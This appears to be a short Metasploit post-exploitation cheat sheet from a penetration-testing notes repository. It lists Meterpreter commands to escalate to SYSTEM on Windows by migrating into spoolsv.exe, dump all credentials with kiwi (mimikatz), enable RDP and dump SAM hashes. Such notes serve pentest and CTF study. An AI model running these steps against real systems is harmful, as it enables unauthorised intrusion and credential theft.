killchain-compendium/post_exploitation/docs/metasploit.md

Metasploit

• -j Run job in background
• sessions -i 1 interactive session 1

Meterpreter

• CheatSheet
• Upgrade shell

post/multi/manage/shell_to_meterpreter

• execute command
• search files
• download and upload files

Metasploit after gaining foothold

• Meterpreter shell is opened on target. Run exploit suggester

run post/multi/recon/local_exploit_suggester

• Decide on your exploit and background the meterpreter.
• Use the exploit.

use <path/to/exploit>

• Fill options like session and run the exploit

Privilege Escalation on Windows Using Metasploit

• Find process with higher privs and migrate to it. Example spoolsv.exe.

migrate -N spoolsv.exe

• After NT AUTHORITY\SYSTEM is gained start mimikatz. and dump all creds

load kiwi
help
creds_all

• Enable RDP via run post/windows/manage/enable_rdp

Hashdump on Windows

• Meterpreter

run post/windows/gather/hashdump

load kiwi
lsa_dump_sam